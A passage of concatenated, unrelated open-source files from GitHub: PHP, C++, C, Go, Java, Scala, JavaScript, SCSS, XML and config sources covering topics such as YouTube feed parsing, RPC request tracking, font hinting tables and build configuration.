* http://framework.zend.com/license/new-bsd
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@zend.com so we can send you a copy immediately.
*
* @category Zend
* @package Zend_Gdata
* @subpackage Media
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
* @version $Id: MediaRating.php 20096 2010-01-06 02:05:09Z bkarwin $
*/
/**
* @see Zend_Gdata_Extension
*/
require_once 'Zend/Gdata/Extension.php';
/**
* Represents the media:rating element specific to YouTube.
*
* @category Zend
* @package Zend_Gdata
* @subpackage YouTube
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
*/
class Zend_Gdata_YouTube_Extension_MediaRating extends Zend_Gdata_Extension
{
protected $_rootElement = 'rating';
protected $_rootNamespace = 'media';
/**
* @var string
*/
protected $_scheme = null;
/**
* @var string
*/
protected $_country = null;
/**
* Constructs a new MediaRating element
*
* @param string $text
* @param string $scheme
* @param string $country
*/
public function __construct($text = null, $scheme = null, $country = null)
{
$this->registerAllNamespaces(Zend_Gdata_Media::$namespaces);
parent::__construct();
$this->_scheme = $scheme;
$this->_country = $country;
$this->_text = $text;
}
/**
* Retrieves a DOMElement which corresponds to this element and all
* child properties. This is used to build an entry back into a DOM
* and eventually XML text for sending to the server upon updates, or
* for application storage/persistence.
*
* @param DOMDocument $doc The DOMDocument used to construct DOMElements
* @return DOMElement The DOMElement representing this element and all
* child properties.
*/
public function getDOM($doc = null, $majorVersion = 1, $minorVersion = null)
{
$element = parent::getDOM($doc, $majorVersion, $minorVersion);
if ($this->_scheme !== null) {
$element->setAttribute('scheme', $this->_scheme);
}
if ($this->_country != null) {
$element->setAttribute('country', $this->_country);
}
return $element;
}
/**
* Given a DOMNode representing an attribute, tries to map the data into
* instance members. If no mapping is defined, the name and value are
* stored in an array.
*
* @param DOMNode $attribute The DOMNode attribute needed to be handled
*/
protected function takeAttributeFromDOM($attribute)
{
switch ($attribute->localName) {
case 'scheme':
$this->_scheme = $attribute->nodeValue;
break;
case 'country':
$this->_country = $attribute->nodeValue;
break;
default:
parent::takeAttributeFromDOM($attribute);
}
}
/**
* @return string
*/
public function getScheme()
{
return $this->_scheme;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setScheme($value)
{
$this->_scheme = $value;
return $this;
}
/**
* @return string
*/
public function getCountry()
{
return $this->_country;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setCountry($value)
{
$this->_country = $value;
return $this;
}
}
/* Update alert message: A new version of {APP NAME} is available. Please update to version {NEW VERSION} now.*/
"A new version of %@ is available. Please update to version %@ now."="نسخه جدید %@ در دسترس است. لطفا همین حالا به نسخه %@ بروزرسانی کنید.";
/* Update alert title */
"Update Available"="بروزرسانی در دسترس";
/* Update alert dismiss button title */
"Next time"="دفعه بعد";
/* Update alert skip button title */
"Skip this version"="رد این نسخه";
/* Update alert skip button title */
"Update"="بروزرسانی";
// Container widths
//
// Set the container width, and override it for fixed navbars in media queries.
@if $enable-grid-classes {
.container {
@include make-container();
@include make-container-max-widths();
}
}
// Fluid container
//
// Utilizes the mixin meant for fixed width containers, but with 100% width for
// fluid, full width layouts.
@if $enable-grid-classes {
.container-fluid {
@include make-container();
}
}
// Row
//
// Rows contain and clear the floats of your columns.
@if $enable-grid-classes {
.row {
@include make-row();
}
// Remove the negative margin from default .row, then the horizontal padding
// from all immediate children columns (to prevent runaway style inheritance).
.no-gutters {
margin-right: 0;
margin-left: 0;
> .col,
> [class*="col-"] {
padding-right: 0;
padding-left: 0;
}
}
}
// Columns
//
// Common styles for small and large grid columns
@if $enable-grid-classes {
@include make-grid-columns();
}
| {
"pile_set_name": "Github"
} |
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
#pragma once
#include <cstdint>
#include <set>
#include <string>
#include "kudu/gutil/ref_counted.h"
#include "kudu/util/locks.h"
#include "kudu/util/status.h"
namespace kudu {
namespace rpc {
// RequestTracker implementation, inspired by:
// "Implementing Linearizability at Large Scale and Low Latency" by Colin Lee et al.
//
// This generates sequence numbers for retriable RPCs and tracks the ongoing ones.
// The main point of this is to enable exactly-once semantics, i.e. making sure that
// an RPC is only executed once, by uniquely identifying each RPC that is sent to
// the server.
//
// Note that the sequence numbers here are different from RPC 'call ids'. A call id
// uniquely identifies a call _to a server_. All calls have a call id that is
// assigned incrementally. Sequence numbers, on the other hand, uniquely identify
// the RPC operation itself. That is, if an RPC is retried on another server it will
// have a different call id, but the same sequence number.
//
// By keeping track of the RPCs that are in-flight and which ones are completed
// we can determine the first incomplete RPC. When this information is sent
// to the server it can use it to garbage collect RPC results that it might be
// saving for future retries, since it now knows there won't be any.
//
// This class is thread safe.
class RequestTracker : public RefCountedThreadSafe<RequestTracker> {
public:
typedef int64_t SequenceNumber;
static const RequestTracker::SequenceNumber kNoSeqNo;
explicit RequestTracker(std::string client_id);
// Creates a new, unique, sequence number.
// Sequence numbers are assigned in increasing integer order.
// Returns Status::OK() and sets 'seq_no' if it was able to generate a sequence number
// or returns Status::ServiceUnavailable() if too many RPCs are in-flight, in which case
// the caller should try again later.
Status NewSeqNo(SequenceNumber* seq_no);
// Returns the sequence number of the first incomplete RPC.
// If there is no incomplete RPC returns kNoSeqNo.
SequenceNumber FirstIncomplete();
// Marks the rpc with 'seq_no' as completed.
void RpcCompleted(const SequenceNumber& seq_no);
// Returns the client id for this request tracker.
const std::string& client_id() { return client_id_; }
private:
// The client id for this request tracker.
const std::string client_id_;
// Lock that protects all non-const fields.
simple_spinlock lock_;
// The next sequence number.
SequenceNumber next_;
// The (ordered) set of incomplete RPCs.
std::set<SequenceNumber> incomplete_rpcs_;
};
} // namespace rpc
} // namespace kudu
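The garbage-collection idea in the class comment above can be illustrated with a minimal standalone sketch. This is a toy model of the scheme, not Kudu's actual implementation — the class name and simplifications are mine; it only shows why an ordered set makes "first incomplete" cheap to answer:

```cpp
#include <cassert>
#include <cstdint>
#include <set>

// Toy model of the tracking scheme described above: hand out increasing
// sequence numbers, remember the incomplete ones in an ordered set, and
// report the smallest still-incomplete number (or kNoSeqNo if none).
class ToySeqTracker {
 public:
  static constexpr int64_t kNoSeqNo = -1;

  int64_t NewSeqNo() {
    int64_t seq = next_++;
    incomplete_.insert(seq);
    return seq;
  }

  int64_t FirstIncomplete() const {
    return incomplete_.empty() ? kNoSeqNo : *incomplete_.begin();
  }

  void RpcCompleted(int64_t seq) { incomplete_.erase(seq); }

 private:
  int64_t next_ = 0;
  std::set<int64_t> incomplete_;  // ordered, so *begin() is the minimum
};
```

Once `FirstIncomplete()` has advanced past a sequence number, the server knows no retry with a smaller number can still arrive, so any cached results for those RPCs can be discarded.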
| {
"pile_set_name": "Github"
} |
/***************************************************************************/
/* */
/* ftgasp.c */
/* */
/* Access of TrueType's `gasp' table (body). */
/* */
/* Copyright 2007 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
#include <ft2build.h>
#include FT_GASP_H
#include FT_INTERNAL_TRUETYPE_TYPES_H
FT_EXPORT_DEF( FT_Int )
FT_Get_Gasp( FT_Face face,
FT_UInt ppem )
{
FT_Int result = FT_GASP_NO_TABLE;
if ( face && FT_IS_SFNT( face ) )
{
TT_Face ttface = (TT_Face)face;
if ( ttface->gasp.numRanges > 0 )
{
TT_GaspRange range = ttface->gasp.gaspRanges;
TT_GaspRange range_end = range + ttface->gasp.numRanges;
while ( ppem > range->maxPPEM )
{
range++;
if ( range >= range_end )
goto Exit;
}
result = range->gaspFlag;
/* ensure that we don't have spurious bits */
if ( ttface->gasp.version == 0 )
result &= 3;
}
}
Exit:
return result;
}
/* END */
| {
"pile_set_name": "Github"
} |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package eks provides the client and types for making API
// requests to Amazon Elastic Kubernetes Service.
//
// Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service that
// makes it easy for you to run Kubernetes on AWS without needing to stand up
// or maintain your own Kubernetes control plane. Kubernetes is an open-source
// system for automating the deployment, scaling, and management of containerized
// applications.
//
// Amazon EKS runs up-to-date versions of the open-source Kubernetes software,
// so you can use all the existing plugins and tooling from the Kubernetes community.
// Applications running on Amazon EKS are fully compatible with applications
// running on any standard Kubernetes environment, whether running in on-premises
// data centers or public clouds. This means that you can easily migrate any
// standard Kubernetes application to Amazon EKS without any code modification
// required.
//
// See https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01 for more information on this service.
//
// See eks package documentation for more information.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/
//
// Using the Client
//
// To contact Amazon Elastic Kubernetes Service with the SDK use the New function to create
// a new service client. With that client you can make API requests to the service.
// These clients are safe to use concurrently.
//
// See the SDK's documentation for more information on how to use the SDK.
// https://docs.aws.amazon.com/sdk-for-go/api/
//
// See aws.Config documentation for more information on configuring SDK clients.
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config
//
// See the Amazon Elastic Kubernetes Service client EKS for more
// information on creating client for this service.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/#New
package eks
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2016 Red Hat, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.syndesis.server.runtime.swagger;
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import io.swagger.v3.core.jackson.ModelResolver;
import io.swagger.v3.core.util.Json;
import io.swagger.v3.oas.models.media.Schema;
import io.syndesis.common.model.Kind;
/**
* We're using {@link Kind#modelName} as value for the {@link Kind} enum values.
* The OpenAPI document generation has no knowledge of that so this
* {@link ModelResolver} sets {@code enum} values to the values of the
* {@code modelName}.
*/
public final class KindModelResolver extends ModelResolver {
private static final List<String> KINDS;
static {
KINDS = Stream.of(Kind.values())
.map(k -> k.modelName)
.collect(Collectors.toList());
}
public KindModelResolver() {
super(Json.mapper());
}
@Override
protected void _addEnumProps(final Class<?> propClass, @SuppressWarnings("rawtypes") final Schema property) {
if (Kind.class.equals(propClass)) {
@SuppressWarnings("unchecked")
final Schema<String> kindProperty = property;
kindProperty.setEnum(KINDS);
} else {
super._addEnumProps(propClass, property);
}
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
Copyright (c) 1997-2017 Oracle and/or its affiliates. All rights reserved.
The contents of this file are subject to the terms of either the GNU
General Public License Version 2 only ("GPL") or the Common Development
and Distribution License("CDDL") (collectively, the "License"). You
may not use this file except in compliance with the License. You can
obtain a copy of the License at
https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
or packager/legal/LICENSE.txt. See the License for the specific
language governing permissions and limitations under the License.
When distributing the software, include this License Header Notice in each
file and include the License file at packager/legal/LICENSE.txt.
GPL Classpath Exception:
Oracle designates this particular file as subject to the "Classpath"
exception as provided by Oracle in the GPL Version 2 section of the License
file that accompanied this code.
Modifications:
If applicable, add the following below the License Header, with the fields
enclosed by brackets [] replaced by your own identifying information:
"Portions Copyright [year] [name of copyright owner]"
Contributor(s):
If you wish your version of this file to be governed by only the CDDL or
only the GPL Version 2, indicate your decision by adding "[Contributor]
elects to include this software in this distribution under the [CDDL or GPL
Version 2] license." If you don't indicate a single choice of license, a
recipient has the option to distribute your version of this file under
either the CDDL, the GPL Version 2 or to extend the choice of license to
its licensees as provided above. However, if you add GPL Version 2 code
and therefore, elected the GPL Version 2 license, then the option applies
only if the new code is made subject to such option by the copyright
holder.
-->
<web-app version="3.0" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
<context-param>
<param-name>javax.faces.PROJECT_STAGE</param-name>
<param-value>${webapp.projectStage}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.PARTIAL_STATE_SAVING</param-name>
<param-value>${webapp.partialStateSaving}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>${webapp.stateSavingMethod}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.SERIALIZE_SERVER_STATE</param-name>
<param-value>${webapp.serializeServerState}</param-value>
</context-param>
<servlet>
<servlet-name>Faces Servlet</servlet-name>
<servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>Faces Servlet</servlet-name>
<url-pattern>/faces/*</url-pattern>
</servlet-mapping>
<welcome-file-list>
<welcome-file>faces/index.xhtml</welcome-file>
</welcome-file-list>
</web-app>
| {
"pile_set_name": "Github"
} |
These are the functions which can be called on a minecraft:effects_changed criteria
trigger.
addEffect:
Arguments:
String
Usage:
potion type
Notes:
Adds a PotionEffectData for the provided potion type and returns it so functions can be called on it.
| {
"pile_set_name": "Github"
} |
; RUN: opt -strip -S < %s | FileCheck %s
; PR10286
@main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %FOO), i8* blockaddress(@f, %BAR)]
; CHECK: @main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %2), i8* blockaddress(@f, %3)]
declare void @foo() nounwind
declare void @bar() nounwind
define void @f(i8* %indirect.goto.dest) nounwind uwtable ssp {
entry:
indirectbr i8* %indirect.goto.dest, [label %FOO, label %BAR]
; CHECK: indirectbr i8* %0, [label %2, label %3]
FOO:
call void @foo()
ret void
BAR:
call void @bar()
ret void
}
| {
"pile_set_name": "Github"
} |
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('TEST', eras.Run2_2018)
# minimum of logs
process.MessageLogger = cms.Service("MessageLogger",
statistics = cms.untracked.vstring(),
destinations = cms.untracked.vstring("cout"),
cout = cms.untracked.PSet(
threshold = cms.untracked.string("WARNING")
)
)
# raw data source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring("/store/data/Run2018D/ZeroBias/RAW/v1/000/320/688/00000/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
#fileNames = cms.untracked.vstring("root://eoscms.cern.ch//eos/cms/store/group/phys_pps/sw_test_input/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
inputCommands = cms.untracked.vstring(
'drop *',
'keep FEDRawDataCollection_*_*_*'
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
# raw-to-digi conversion
process.load("EventFilter.CTPPSRawToDigi.ctppsRawToDigi_cff")
# local RP reconstruction chain with standard settings
process.load("RecoPPS.Configuration.recoCTPPS_cff")
# define GT
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, "106X_dataRun2_v26")
# override alignment settings
process.load("CalibPPS.ESProducers.ctppsRPAlignmentCorrectionsDataESSourceXML_cfi")
process.ctppsRPAlignmentCorrectionsDataESSourceXML.RealFiles = cms.vstring(
"RecoPPS/Local/test/re_alignment/align_base.xml"
)
process.esPreferLocalAlignment = cms.ESPrefer("CTPPSRPAlignmentCorrectionsDataESSourceXML", "ctppsRPAlignmentCorrectionsDataESSourceXML")
# track plotter
process.ctppsTrackDistributionPlotter = cms.EDAnalyzer("CTPPSTrackDistributionPlotter",
tagTracks = cms.InputTag("ctppsLocalTrackLiteProducer"),
outputFile = cms.string("output_tracks_base.root")
)
# processing sequences
process.path = cms.Path(
process.ctppsRawToDigi
* process.recoCTPPS
* process.ctppsTrackDistributionPlotter
)
# output configuration
process.output = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("output_base.root"),
outputCommands = cms.untracked.vstring(
"drop *",
'keep CTPPSLocalTrackLites_*_*_*'
)
)
process.outpath = cms.EndPath(process.output)
| {
"pile_set_name": "Github"
} |
#pragma once
#include <ostream>
#include_next <unordered_map>
#include <elle/print-fwd.hh>
namespace std
{
template <typename... Args>
std::ostream&
operator <<(ostream& out,
unordered_map<Args...> const& s)
{
auto const format = is_fixed(out) ? "%s%f: %f" : "%s%s: %s";
out << '{';
auto* sep = "";
for (auto const& e: s)
{
elle::print(out, format, sep, e.first, e.second);
sep = ", ";
}
out << '}';
return out;
}
template <typename... Args>
class keys_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
keys_iterator() = default;
keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
class const_keys_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_keys_iterator() = default;
const_keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
const_keys_iterator<Args...>
iter_keys(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.begin());
}
template <typename... Args>
const_keys_iterator<Args...>
iter_keys_end(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.end());
}
template <typename... Args>
class values_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
values_iterator() = default;
values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
values_iterator<Args...>
iter_values(std::unordered_map<Args...>& c)
{
return values_iterator<Args...>(c.begin());
}
template <typename... Args>
class const_values_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_values_iterator() = default;
const_values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
const_values_iterator<Args...>
iter_values(std::unordered_map<Args...> const& c)
{
return const_values_iterator<Args...>(c.begin());
}
// http://www.open-std.org/JTC1/SC22/wg21/docs/papers/2014/n4161.htm
template <typename... Args, typename Pred>
void erase_if(unordered_map<Args...>& c, Pred pred)
{
for (auto it = begin(c); it != end(c);)
if (pred(*it))
it = c.erase(it);
else
++it;
}
}
// Local Variables:
// mode: c++
// End:
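The `erase_if` function at the bottom of the header implements the erase-while-iterating idiom from N4161. A standalone re-implementation (for illustration only; C++20 later standardized this as `std::erase_if`) shows why the pattern is safe — `erase()` returns the iterator following the removed element, so the loop never advances a dangling iterator:

```cpp
#include <cassert>
#include <unordered_map>

// Generic sketch of the erase_if helper defined above: remove every
// element matching the predicate while iterating.  erase() returns the
// next valid iterator, so nothing we still hold is ever invalidated.
template <typename Map, typename Pred>
void erase_if_sketch(Map& c, Pred pred) {
  for (auto it = c.begin(); it != c.end();)
    if (pred(*it))
      it = c.erase(it);  // jump past the removed element
    else
      ++it;
}
```

A plain `for` loop with `++it` after an unconditional `erase(it)` would be undefined behavior; this shape is the standard workaround for associative containers.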
| {
"pile_set_name": "Github"
} |
/* __ *\
** ________ ___ / / ___ Scala API **
** / __/ __// _ | / / / _ | (c) 2002-2011, LAMP/EPFL **
** __\ \/ /__/ __ |/ /__/ __ | http://scala-lang.org/ **
** /____/\___/_/ |_/____/_/ | | **
** |/ **
\* */
// GENERATED CODE: DO NOT EDIT. See scala.Function0 for timestamp.
package scala
/** A tuple of 19 elements; the canonical representation of a [[scala.Product19]].
*
* @constructor Create a new tuple with 19 elements. Note that it is more idiomatic to create a Tuple19 via `(t1, t2, t3, t4, t5, t6, t7, t8, t9, t10, t11, t12, t13, t14, t15, t16, t17, t18, t19)`
* @param _1 Element 1 of this Tuple19
* @param _2 Element 2 of this Tuple19
* @param _3 Element 3 of this Tuple19
* @param _4 Element 4 of this Tuple19
* @param _5 Element 5 of this Tuple19
* @param _6 Element 6 of this Tuple19
* @param _7 Element 7 of this Tuple19
* @param _8 Element 8 of this Tuple19
* @param _9 Element 9 of this Tuple19
* @param _10 Element 10 of this Tuple19
* @param _11 Element 11 of this Tuple19
* @param _12 Element 12 of this Tuple19
* @param _13 Element 13 of this Tuple19
* @param _14 Element 14 of this Tuple19
* @param _15 Element 15 of this Tuple19
* @param _16 Element 16 of this Tuple19
* @param _17 Element 17 of this Tuple19
* @param _18 Element 18 of this Tuple19
* @param _19 Element 19 of this Tuple19
*/
case class Tuple19[+T1, +T2, +T3, +T4, +T5, +T6, +T7, +T8, +T9, +T10, +T11, +T12, +T13, +T14, +T15, +T16, +T17, +T18, +T19](_1: T1, _2: T2, _3: T3, _4: T4, _5: T5, _6: T6, _7: T7, _8: T8, _9: T9, _10: T10, _11: T11, _12: T12, _13: T13, _14: T14, _15: T15, _16: T16, _17: T17, _18: T18, _19: T19)
extends Product19[T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15, T16, T17, T18, T19]
{
  override def toString() = "(" + _1 + "," + _2 + "," + _3 + "," + _4 + "," + _5 + "," + _6 + "," + _7 + "," + _8 + "," + _9 +
"," + _10 + "," + _11 + "," + _12 + "," + _13 + "," + _14 + "," + _15 + "," + _16 + "," + _17 + "," + _18 + "," + _19 + ")"
}
| {
"pile_set_name": "Github"
} |
/**
* Update: 15-5-11
* Editor: qihongye
*/
var fs = require('fs');
var path = require('path');
var fis = require('../lib/fis.js');
var _ = fis.file;
var defaultSettings = (require('../lib/config.js')).DEFALUT_SETTINGS;
var expect = require('chai').expect;
var u = fis.util;
var config = null;
describe('config: config',function(){
beforeEach(function(){
fis.project.setProjectRoot(__dirname);
fis.config.init(defaultSettings);
process.env.NODE_ENV = 'dev';
});
it('set / get', function () {
fis.set('namespace', 'common');
expect(fis.get('namespace')).to.equal('common');
fis.set('obj', {a:'a'});
fis.set('obj.b', 'b');
expect(fis.get('obj')).to.deep.equal({a:'a', b:'b'});
expect(fis.get('obj.c', {c: 'c'})).to.deep.equal({c:'c'});
expect(fis.get('obj.a')).to.equal('a');
expect(fis.get('obj.b')).to.equal('b');
});
it('media', function () {
fis.set('a', 'a');
fis.set('b', 'b');
fis.media('prod').set('a', 'aa');
expect(fis.get('a')).to.equal('a');
expect(fis.media('prod').get('a')).to.equal('aa');
expect(fis.media('prod').get('b')).to.equal('b');
expect(fis.media('prod').get('project.charset')).to.equal('utf8');
});
it('fis.match',function(){
fis.match('**', {
release: 'static/$&'
}); // fis.config.match
fis.match('**/js.js', {
domain: 'www.baidu.com',
useHash: false
}, 1);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
//without domain
    // useDomain has been removed, so this should no longer have any effect
fis.match('**/js.js', {
useDomain: false
}, 2);
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js.js?__inline');
fis.match('**/js.js', {
release: null
}, 3);
//without path
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ()
fis.match('**/v1.0-(*)/(*).html', {
release: '/$1/$2'
});
path = __dirname+'/file/ext/v1.0-layout/test.html?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/layout/test.html?__inline');
fis.match('!**/js.js', {
release: '/static/$&',
useHash: true,
domain: 'www.baidu.com'
});
//with !
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/file/ext/modular/js.js?__inline');
// with ! but not match
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('www.baidu.com/static/file/ext/modular/js_'+ f.getHash() +'.less?__inline');
});
it('match ${}', function() {
fis.match('**/*.js', {
release: null,
useHash: false
})
fis.set('coffee', 'js');
fis.match('**/js.js', {
release: '/static/$&'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/j.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/file/ext/modular/j.js?__inline');
});
  it('match mixed usage', function() {
fis.set('ROOT', 'js');
fis.match('**', {
useHash: false
});
fis.match('(**/${ROOT}.js)', {
release: '/static/js/$1'
});
fis.match('(**/${ROOT}.less)', {
release: '/static/js/$1'
});
path = __dirname+'/file/ext/modular/js.js?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.js?__inline');
path = __dirname+'/file/ext/modular/js.less?__inline';
var f = _.wrap(path);
var url = f.getUrl();
expect(url).to.equal('/static/js/file/ext/modular/js.less?__inline');
});
it('del', function(){
fis.config.del();
var origin = fis.config.get();
fis.set('a.b', 'b');
fis.media('pro').set('a.b', 'b');
fis.config.del('a.b');
expect(fis.get('a')).to.deep.equal({});
expect(fis.media('pro').get('a.b')).to.equal('b');
fis.config.del('a');
expect(fis.get()).to.deep.equal(origin);
fis.media('pro').del('a');
expect(fis.media('pro').get()).to.deep.equal({});
});
it('getSortedMatches', function() {
fis.media('prod').match('a', {
name: ''
});
var matches = fis.media('prod')._matches.concat();
var initIndex = matches[matches.length - 1].index;
fis.match('b', {
name: ''
}, 1)
fis.match('c', {
name: ''
}, 2)
fis.media('prod').match('b', {
name: 'prod'
}, 1)
fis.media('prod').match('c', {
name: 'prod'
}, 2);
var result_gl = [
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 1,
index: initIndex + 1
},
{
raw: 'c',
reg: u.glob('c'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 2,
index: initIndex + 2
}
], result_prod = [
{
raw: 'a',
reg: u.glob('a'),
negate: false,
properties: {name: ''},
media: 'prod',
weight: 0,
index: initIndex + 0
},
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 1,
index: initIndex + 1
},
{
raw: 'b',
reg: u.glob('b'),
negate: false,
properties: {name: 'prod'},
media: 'prod',
weight: 1,
index: initIndex + 3
},
{
raw: 'c',
reg: u.glob('c'),
negate: false,
properties: {name: ''},
media: 'GLOBAL',
weight: 2,
index: initIndex + 2
},
{
raw: 'c',
reg: u.glob('c'),
negate: false,
properties: {name: 'prod'},
media: 'prod',
weight: 2,
index: initIndex + 4
},
];
var xp = fis.config.getSortedMatches();
expect(xp).to.deep.equal(result_gl);
var xp2 = fis.media('prod').getSortedMatches();
expect(xp2).to.deep.equal(result_prod);
});
it("hook",function(){
fis.config.hook("module");
expect(fis.env().parent.data.modules.hook[1]['__plugin']).to.equal('module');
});
it("unhook",function(){
fis.config.unhook("module");
expect(fis.env().parent.data.modules.hook.length).to.equal(1);
});
});
| {
"pile_set_name": "Github"
} |
/**
* ValueIterator.cpp
*
* Implementation of the value iterator
*
* @author Emiel Bruijntjes <emiel.bruijntjes@copernica.com>
* @copyright 2014 Copernica BV
*/
#include "includes.h"
/**
* Set up namespace
*/
namespace Php {
/**
* Constructor
* @param impl Implementation iterator
*/
ValueIterator::ValueIterator(ValueIteratorImpl *impl) : _impl(impl) {}
/**
* Copy constructor
* @param that
*/
ValueIterator::ValueIterator(const ValueIterator &that) : _impl(that._impl->clone()) {}
/**
* Destructor
*/
ValueIterator::~ValueIterator() = default;
/**
* Increment position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator++()
{
// increment implementation
_impl->increment();
// done
return *this;
}
/**
* Decrement position
* @return ValueIterator
*/
ValueIterator &ValueIterator::operator--()
{
// decrement implementation
_impl->decrement();
// done
return *this;
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator==(const ValueIterator &that) const
{
return _impl->equals(that._impl.get());
}
/**
* Compare with other iterator
* @param that
* @return bool
*/
bool ValueIterator::operator!=(const ValueIterator &that) const
{
return !_impl->equals(that._impl.get());
}
/**
 *  Dereference, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> &ValueIterator::operator*() const
{
return _impl->current();
}
/**
* Dereference, this returns a std::pair with the current key and value
* @return std::pair
*/
const std::pair<Value,Value> *ValueIterator::operator->() const
{
return &_impl->current();
}
/**
* End namespace
*/
}
| {
"pile_set_name": "Github"
} |
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
